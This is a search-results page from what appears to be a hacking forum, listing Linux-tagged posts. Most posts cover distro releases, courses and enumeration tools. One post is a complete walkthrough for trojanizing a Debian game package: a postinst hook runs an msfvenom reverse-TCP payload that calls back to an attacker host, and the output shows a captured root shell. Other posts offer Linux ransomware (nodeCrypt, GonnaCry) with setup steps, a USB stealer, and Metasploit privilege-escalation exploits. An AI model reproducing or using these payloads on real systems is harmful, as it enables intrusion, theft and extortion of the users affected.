Search the Community

Showing results for tags 'linux'.

Found 64 results

  1. Using Old Windows Symbols with Ghidra in Linux

    Recently, while developing course material for a reverse engineering course I was making, I needed to get the symbols for the venerable sol.exe. Unfortunately the world’s greatest solitaire program is no longer shipped with Windows, and subsequently Microsoft’s symbol servers have stopped providing debug information for it. The last complication was that Ghidra’s support for PDB is limited to Windows-only systems. This guide will walk through how I got the symbols for an unsupported OS (XP) working inside of the Ghidra Linux client. [Hidden Content]
  2. This Metasploit module exploits an issue in ptrace_link in kernel/ptrace.c before Linux kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but not over an SSH session, as it requires execution from within the context of a user with an active Polkit agent. In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit's pkexec helper with PTRACE_TRACEME.
  3. dEEpEst

    USB Stealer Linux OS

    Well this USB stealer is not the same as in Windows OS, because on Linux you don't have permission to run scripts direct from USB. That's why you would need to copy script from USB to desktop for example, give permission to it and then just run the script! [Hidden Content]
  4. 0x1

    Postenum

    Postenum is a clean, nice and easy tool for basic/advanced privilege escalation vectors/techniques. Postenum tool is intended to be executed locally on a Linux box. Be more than a normal user. Be the ROOT.

    USE:
        ./postenum.sh [option]
        ./postenum.sh -s
        ./postenum.sh -c

    Options:
        -a : All
        -s : Filesystem [SUID, SGID, Config/DB files, etc.]
        -l : Shell escape and development tools
        -c : The most interesting files
        -n : Network settings
        -p : Services and cron jobs
        -o : OS informations and kernel exploits
        -v : Software's versions
        -t : Fstab credentials and databases checker

    Version 0.8

    Download: [Hidden Content]
  5. Complete Kali Linux Tutorial,Complete penetration testing training,Learn Hacking Created by Vishal Patel English What Will I Learn? Footprinting,Scanning,Enumeration,System Hacking,Trojan and Backdoors,Viruses and worms,Denial-of-service,Sniffing,Session Hijacking,Wireless Hacking,Firewall,IDS,Honeypots,Buffer Overflows,Penetration Testing,Cryptography Requirements Basic IT Skill Internet Users You will gain a comprehensive understanding of vulnerability assessment and the tools used in this process. What kind of security measures do you take to protect your facilities, equipment, resources, personnel, and property from damage caused by unauthorized access? In this course, Physical Security, these are questions that we will be answering. Footprinting is the gathering of information related to a particular computer and its users and systems. Reconnaissance is an exploration that is conducted to gain information. Network scanning is the scanning of public or private networks to find out which systems are running, their IP addresses, and which services they are running. In Port Scanning, you will learn how ports can be scanned, how a hacker can break into your network through the ports, and the countermeasures you can take to protect your device or network. Banner grabbing is a technique used to grab information about computer systems on a network and the services running its open ports. In this course you will be introduced to enumeration and the many different uses it has in computer systems. This course will include demos on the different tools and uses of enumeration. In this course you will be learning the fundamentals of Linux. We will be pairing this course with demos with a more in-depth look into some of the fundamentals and tools of Linux. Pentesting is an attack on a system in hopes of finding security weaknesses. 
In the course Configuring Linux for Pentesting, you will be learning the steps to configure Linux for pentesting and tools used for pentesting on a Linux system. Whenever we login to a computer system, we provide information to identify ourselves. We refer to this as authentication. Ensure that you know everything involved in securing a Windows system against attack. During this course you’ll get into Windows passwords — how they’re created, how they’re stored, and different methods used to crack them. You will take a good look at spyware, the activities it performs, different types of spyware, and the countermeasures needed in order to prevent hackers from utilizing these types of techniques against your company. You will also spend time studying different types of keyloggers. There are three different types of keyloggers that we see used in today’s environments: hardware, software, and kernel/driver keyloggers. Covering Tracks will be going over various ways that attackers have at their disposal to cover any tracks that may lead to their unwanted eviction, or worse yet, to an audit trail that would lead directly back to them. Trojans and Backdoors is the course where our software is going to be going undercover. You will discover what viruses and worms are and how they can infect computers and systems. Sniffers is our course where we take a look at Network Sniffing. Social engineering is the art of extorting employees for information. Become familiar with the following concepts: denial-of-service, distributed denial-of-service, and how the denial-of-service and distributed denial-of-service attacks take place. In the course Session Hijacking, you will learn details about session hijacking, well-known techniques employed by aggressors, the steps involved in session hijacking, various types of session hijacking, tools for hijacking sessions, ways you can protect yourselves from session hijacking, and how pentesting can be used to identify vulnerabilities. 
Hacking Web and Application Servers is a course that will give you a good idea about vulnerabilities and attacks available for web servers and web applications. In our course Advanced Exploitation Techniques, you will learn what advanced exploitation techniques are and how you can use them in your penetration testing. Who is the target audience? Anyone who wants to learn how to hack, IT Professionals, Engineers, IT Students, Computer Known, Network Engineers, Internet Users. Size: 2.34 GB [torrent file] [Hidden Content]
  6. dEEpEst

    Binary Linux Trojan

    In order to demonstrate that client side attacks and trojans are not exclusive to the Windows world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on Linux. We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package freesweep, a text-based version of Mine Sweeper. [email protected]:~# apt-get --download-only install freesweep Reading package lists... Done Building dependency tree Reading state information... Done ...snip... [email protected]:~# mkdir /tmp/evil [email protected]:~# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil [email protected]:~# cd /tmp/evil/ [email protected]:/tmp/evil# Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added “features”. [email protected]:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work [email protected]:/tmp/evil# mkdir work/DEBIAN In the DEBIAN directory, create a file named control that contains the following: [email protected]:/tmp/evil/work/DEBIAN# cat control Package: freesweep Version: 0.90-1 Section: Games and Amusement Priority: optional Architecture: i386 Maintainer: Ubuntu MOTU Developers ([email protected]) Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use. We also need to create a post-installation script that will execute our binary. 
In our DEBIAN directory, we’ll create a file named postinst that contains the following: [email protected]:/tmp/evil/work/DEBIAN# cat postinst #!/bin/sh sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep & Now we’ll create our malicious payload. We’ll be creating a reverse shell to connect back to us named ‘freesweep_scores’. [email protected]:~# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 -b "\x00" -f elf -o /tmp/evil/work/usr/games/freesweep_scores Found 10 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 98 (iteration=0) x86/shikata_ga_nai chosen with final size 98 Payload size: 98 bytes Saved as: /tmp/evil/work/usr/games/freesweep_scores We’ll now make our post-installation script executable and build our new package. The built file will be named work.deb so we will want to change that to freesweep.deb and copy the package to our webroot directory. [email protected]:/tmp/evil/work/DEBIAN# chmod 755 postinst [email protected]:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'. [email protected]:/tmp/evil# mv work.deb freesweep.deb [email protected]:/tmp/evil# cp freesweep.deb /var/www/ If it is not already running, we’ll need to start the Apache web server. [email protected]:/tmp/evil# service apache2 start We will need to set up the Metasploit multi/handler to receive the incoming connection. [email protected]:~# msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/x86/shell/reverse_tcp; set LHOST 192.168.1.101; set LPORT 443; run; exit -y" PAYLOAD => linux/x86/shell/reverse_tcp LHOST => 192.168.1.101 LPORT => 443 [*] Started reverse handler on 192.168.1.101:443 [*] Starting the payload handler... On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game. 
[email protected]:~$ wget [Hidden Content] [email protected]:~$ sudo dpkg -i freesweep.deb As the victim installs and plays our game, we have received a shell! [*] Sending stage (36 bytes) [*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129) ifconfig eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6 inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:49 errors:0 dropped:0 overruns:0 frame:0 TX packets:51 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB) Interrupt:17 Base address:0x1400 ...snip... hostname ubuntu id uid=0(root) gid=0(root) groups=0(root) Source: [HIDE][Hidden Content]]
  7. Udemy Learn Kali Linux and Hack Android Mobile devices Penetration Testing Setup Your Lab Finding Your Way Around Kali Important Tools Exploitation Hacking Android devices Social Engineering Hacking using Android devices Remote attacks On Android [Hidden Content]
  8. itsMe

    Kali Linux 2019.3 Release

    We are pleased to announce that our third release of 2019, Kali Linux 2019.3, is available immediately for download. This release brings our kernel up to version 5.2.9, and includes various new features across the board with NetHunter, ARM and packages (plus the normal bug fixes and updates). As promised in our roadmap blog post, there are both user facing and backend updates.

    CloudFlare

    Kali Linux is Open Source, and Cloudflare hearts Open Source – so it’s a perfect match! As a result, CloudFlare has graciously allowed us to use their content delivery network (CDN) to mirror our repository, allowing us to now distribute our content through them. A more technical breakdown can be found on their blog. We are currently running the CloudFlare services side by side with our standard and community mirrors. If you notice the kali.download domain appearing on screen when you run apt update, this means you’re using CloudFlare’s services.

    Tool Updates & New Packages

    As always, we have our updates for all our tools, including (but not limited to):

      • Burp Suite
      • HostAPd-WPE
      • Hyperion
      • Kismet
      • Nmap

    There is a new tool (and it is included by default), amass, that has been well received in the bug bounty world. [Hidden Content]
  9. BlackArch Linux 2019.09.01 Releases: Linux kernel 5.2.9, added more than 150 new tools

    BlackArch Linux is an open source distribution of Linux derived from the lightweight and powerful Arch Linux operating system and designed from the ground up to be used by security professionals for penetration testing tasks. The repository contains more than 2050 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs. For more information, see the installation instructions.

    ChangeLog 2019.09.01:

      • added more than 150 new tools
      • added terminus font for all WMs (thanks to psf for i3-wm bugfixes)
      • included linux kernel 5.2.9
      • new ~/.vim and ~/.vimrc (thanks to noptrix offering his config files)
      • updated blackarch-installer to v1.1.19
      • various improvements and bugfixes
      • removed dwm window manager
      • replaced the default terminal xterm with rxvt-unicode
      • updated look&feel: new BlackArch theme for WMs, grub, syslinux, etc. (special thanks to Erik!)
      • QA’ed and fixed all packages (runtime exec).
      • updated all blackarch tools and packages including config files
      • updated all system packages
      • updated all window manager menus (awesome, fluxbox, openbox)

    [Hidden Content]
  10. 0x1

    Linux Smart Enumeration

    Linux enumeration tool for pentesting and CTFs with verbosity levels.

    Unlike LinEnum, lse tries to gradually expose the information depending on its importance from a privesc point of view.

    What is it?

    This script will show relevant information about the security of the local Linux system. It has 3 levels of verbosity so you can control how much information you see. In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system. By default it will ask you some questions: mainly the current user password (if you know it) so it can do some additional tests.

    How to use it?

    The idea is to get the information gradually. First you should execute it just like ./lse.sh. If you see some green yes!, you probably have already some good stuff to work with. If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting. If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find it useful to use ./lse.sh -l2 | less -r. You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

    Use: ./lse.sh [options]

     OPTIONS
       -c           Disable color
       -i           Non interactive mode
       -h           This help
       -l LEVEL     Output verbosity level
                      0: Show highly important results. (default)
                      1: Show interesting results.
                      2: Show all gathered information.
       -s SELECTION Comma separated list of sections or tests to run. Available
                    sections:
                      usr: User related tests.
                      sud: Sudo related tests.
                      fst: File system related tests.
                      sys: System related tests.
                      sec: Security measures related tests.
                      ret: Recurren tasks (cron, timers) related tests.
                      net: Network related tests.
                      srv: Services related tests.
                      pro: Processes related tests.
                      sof: Software related tests.
                      ctn: Container (docker, lxc) related tests.
                    Specific tests can be used with their IDs (i.e.: usr020,sud)

    Source & Download : [Hidden Content]
  11. Current price: Free. Original price: 19.99 €. 30-day money-back guarantee. LINUXINTVIEW-QA-FREE

    This course includes: 3.5 hours of on-demand video, 2 downloadable resources, lifetime access, access on mobile devices and TV, certificate of completion.

    What you will learn: top linux interview questions and answers common linux questions and answers typical linux questions and answers introduction to linux linux for beginners introduction to linux bash shell terminal overview of some common linux shell commands linux linux administrator

    Description

    This course is suitable for beginner to advanced levels/students. The course aims to prepare the student very well for some of the most common interview questions for Linux related jobs/careers. The course is highly recommended for Linux beginners, and should help the student to start using Linux very quickly. Via detailed answers, clear explanations and engaging practical examples using the Linux BASH shell terminal, the student should be able to do extremely well during interview questions, and successfully secure that job. Linux version used for this course is Ubuntu Linux 18.04, and a live dvd version is used via a virtual machine, so that the student can actually see the Linux desktop while listening to the lectures and following the practical examples. If you learn and understand all the answers to the 57 questions in this course, you should be able to comfortably ace most interviews for junior to intermediate level Linux jobs.

    Who is this course for? linux newbies beginner linux users linux administrators linux users interested in linux people interested in linux jobs anyone interested in Linux ubuntu debian linux users anyone new to linux people interested in learning Linux linux beginners people interested in learning some linux bash shell commands interested in a career in linux [Hidden Content]
  12. Linux suffers from use-after-free read vulnerabilities in show_numa_stats().
  13. dEEpEst

    NodeCrypt - Linux Ransomware

    What is nodeCrypto? Install server Install and run Screenshot What is nodeCrypto? nodeCrypt is a linux Ransomware written in NodeJs that encrypt predefined files. This project was created for educational purposes, you are the sole responsible for the use of nodeCrypto. Install server Upload all file of server/ folder on your webserver. Create a sql database and import sql/nodeCrypto.sql Edit server/libs/db.php and add your SQL ID. Install and run git clone [Hidden Content] cd nodeCrypto && npm install You must edit first variable in index.js Once your configuration is complete, you can start the ransomware. node index.js The files at the root of the web server will encrypt and send to the server. Screenshot To Do Client (victim) Encrypt webserver Use private key for encryption Adapt SSL Server Recover data (user + encrypted file) Format the database Make GUI for webserver Make an executable to decrypt the files (Only on request! Contact me) [Hidden Content]
  14. Linux suffers from broken permission and object lifetime handling for PTRACE_TRACEME.
  15. Cat-Nip Automated Basic Pentest Tool

    This tool will make your basic pentesting task like Information Gathering, Auditing, And Reporting so this tool will do every task fully automatic.

    Pentest Tools Auto Executed With Cat-Nip: Whois Lookup, DNSmap, Nmap, Dmitry, Theharvester, Load Balancing Detector, SSLyze, Automater, Ua Tester, Gobuster, Grabber, Parsero, Uniscan, And More Tool Soon

    [Hidden Content]
  16. Reverie Automated Pentest Tools Designed For Parrot Linux

    This tool will make your basic pentesting task like Information Gathering, Security Auditing, And Reporting so this tool will do every task fully automatic.

    Pentest Tools Auto Executed With Reverie: Whois Lookup, DNSwalk, Nmap, Dmitry, Whatweb, wafw00f, Load Balancing Detector, SSLyze, TLSSled, Automater, Nikto, And More Tool Soon

    [Hidden Content]
  17. itsMe

    Kali Linux Tools Interface

    It is a graphical interface to use information security tools by the browser. The project uses the Kali Linux tools as a reference because it is the distribution that has the largest package of native tools.

    Prerequisites

      • A Debian-based distribution (preferably Kali Linux)
      • The information security tools installed
      • Apache / Nginx service running
      • SSH Service running
      • Shell In A Box (if you want to use the Terminal)

    To install Shell In A Box, use the following command:

        sudo apt-get install shellinabox

    [Hidden Content]
  18. SELECTIVE COLLECTION OF LINUX E-BOOKS [Hidden Content]
  19. This Metasploit module exploits a vulnerability within the "ghelp", "help" and "man" URI handlers within Linux Mint's "ubuntu-system-adjustments" package. Invoking any one of the URI handlers will call the python script "/usr/local/bin/yelp" with the contents of the supplied URI handler as its argument. The script will then search for the strings "gnome-help" or "ubuntu-help" and if it doesn't find either of them it'll then execute os.system("/usr/bin/yelp %s" % args). User interaction is required to exploit this vulnerability. Versions 18.3 through 19.1 are affected.
  20. Pop!_OS, the recently released Linux distribution for the well-known Linux notebook maker System76, is based on the Ubuntu and GNOME desktop environments and aims to provide users with a personalized and fresh experience. Although based on the GNOME desktop environment, System76 customizes user interfaces, drivers, and more, with a modern, simple look and a better user experience. The creative and functional focus of Pop!_OS is aimed at professional users, making Linux desktops more productive and a great helper for engineers, developers, and computer scientists.

    The Pop!_OS developer recently released the Pop!_OS 19.04 ISO image. This version includes the following features:

      • The Slim Mode option maximizes your screen real estate by reducing the height of the header on application windows
      • Dark Mode gives your applications a relaxing ambience for nighttime viewing. Both Dark Mode and Slim Mode can be activated in the Appearance settings menu.
      • Refresh Install allows you to reinstall Pop!_OS without losing Users and any data in your Home directories. This feature is available from the recovery partition on new installations (not upgrades). For more information on how to do this, click here.
      • Pop!_OS has been updated to use version 5.0 of the Linux kernel
      • GNOME has been updated to version 3.32
      • Packaging for both CUDA 10.1 and Tensorflow 1.13.1 toolkits
      • Gamehub and Lutris are now available through the Pop!_Shop
      • Popsicle, the installation media creator for Pop!_OS, has been improved to remove the possibility of UI freezes.
      • The NVIDIA driver has been updated from 410 to 418, which provides new hardware support, security and stability fixes, and improves GNOME Shell animations.

    [Hidden Content]
  21. ArcoLinux is an Arch Linux based distro that uses Arch Linux as a base elements from the AUR (applications from github, debian (deb), redhat (rpm), compressed files, etc…) ArcoLinux created elements (themes, icons, conky’s, tweaks and configs) Features Provide an operating system with all applications with personal theming installed but also bluetooth, printers, … After the installation no fuss and all fun. Provide a continuous stream of tutorials and knowledge on ArcoLinux. Easy setup. No technical knowledge. Low in cpu and memory consumption Provide all icons, themes, cursors, wallpapers, … out of the box. Provide Windows users a comfortable transition to the (Arch) Linux world. Blazing fast. Linux Arch Linux xfce openbox i3wm awesome budgie cinnamon gnome mate bspwm Changelog CALAMARES NEW VERSION 3.2.8 NEW PROJECT ARCOLINUXB XFCE BARE QTILE TUTORIALS AND PROJECTS QTILE OBLOGOUT QTILE MEMORY WIDGET QTILE NET GRAPH WIDGET QTILE NET WIDGET QTILE BATTERY QTILE SUPER + SHIFT + X BREAKING BAD CONKY MAINTENANCE OF GITHUBS NEW IN .BIN GENERAL IMPROVEMENTS FUTURE EFFORTS STAY ROLLING More… [HIDE][Hidden Content]]
  22. Learn the basics of the Linux operating systems. Get to know what it is all about, and familiarize yourself with the practical side. Basically, if you're a complete Linux newbie and looking for a quick and easy guide to get you started this is it. You've probably heard about Linux, the free, open-source operating system that's been pushing up against Microsoft. It's way cheaper, faster, safer, and has a far bigger active community than Windows, so why aren't you on it? Don't worry, Makeuseof.com understands. Like many things, venturing off into a completely unknown world can seem rather scary, and also be pretty difficult in the beginning. It's while adapting to the unknown, that one needs a guiding, and caring hand. This guide will tell you all you need to know in 20 illustrated pages, helping you to take your first steps. Let your curiosity take you hostage and start discovering Linux today, with this manual as your guide! Don't let Makeuseof.com keep you any longer, and download the Newbie's Initiation to Linux. With this free guide you will also receive daily updates on new cool websites and programs in your email for free courtesy of MakeUseOf. [HIDE][Hidden Content]]
  23. GonnaCry Ransomware

    GONNACRY – LINUX RANSOMWARE THAT ENCRYPTS ALL USER FILES

    Original Repository of the GonnaCry Ransomware. This project is OpenSource, feel free to use, study and/or send pull request. GonnaCry is a linux ransomware that encrypts all user files with a strong encryption scheme. There are two versions of the Ransomware Code: C and Python.

    How this ransomware works: [Hidden Content] [Hidden Content]

    How this ransomware encryption scheme works: [Hidden Content]

    Mentions: [Hidden Content] [Hidden Content] [Hidden Content]

    Disclaimer

    This Ransomware mustn't be used to harm/threat/hurt other person's computer. Its purpose is only to share knowledge and awareness about Malware/Cryptography/Operating Systems/Programming. GonnaCry is an academic ransomware made for learning and awareness about security/cryptography. Be aware running C/bin/GonnaCry or Python/GonnaCry/main.py Python/GonnaCry/bin/gonnacry in your computer, it may harm.

    What's a Ransomware?

    A ransomware is a form of malware that prevents legitimate users from accessing their device or data and asks for a payment in exchange for the stolen functionality. They have been used for mass extortion in various forms, but the most successful seem to be encrypting ransomware: most of the user data are encrypted and the key can be retrieved with a payment to the attacker. To be widely successful a ransomware must fulfill three properties:

      • Property 1: The hostile binary code must not contain any secret (e.g. deciphering keys). At least not in an easily retrievable form, indeed white box cryptography can be applied to ransomware.
      • Property 2: Only the author of the attack should be able to decrypt the infected device.
      • Property 3: Decrypting one device can not provide any useful information for other infected devices, in particular the key must not be shared among them.

    Objectives:

      • encrypt all user files with AES-256-CBC.
      • Random AES key and IV for each file.
      • Works even without internet connection.
      • Communication with the server to decrypt Client-private-key.
      • encrypt AES key with client-public-key RSA-2048.
      • encrypt client-private-key with RSA-2048 server-public-key.
      • Change computer wallpaper -> Gnome, LXDE, KDE, XFCE.
      • Decryptor that communicate to server to send keys.
      • python webserver
      • Daemon
      • Dropper

    Download: [Hidden Content]
  24. BackBox Linux is a penetration testing and security assessment oriented Linux distribution providing a network and systems analysis toolkit. It includes some of the most commonly known/used security and analysis tools, aiming for a wide spread of goals, ranging from web application analysis to network analysis, stress tests, sniffing, vulnerability assessment, computer forensic analysis, automotive and exploitation. It has been built on Ubuntu core system yet fully customized, designed to be one of the best Penetration testing and security distribution and more.

    As usual, this major release includes many updates. These include new kernel, updated tools and some structural changes with a focus on maintaining stability and compatibility with Ubuntu 18.04 LTS.

    What’s new

      • Updated Linux Kernel 4.18
      • Updated desktop environment
      • Updated hacking tools
      • Updated ISO Hybrid with UEFI support

    System requirements

      • 32-bit or 64-bit processor
      • 1024 MB of system memory (RAM)
      • 10 GB of disk space for installation
      • Graphics card capable of 800×600 resolution
      • DVD-ROM drive or USB port (3 GB)

    The ISO images for both 32bit & 64bit can be downloaded from the official web site download section: [Hidden Content]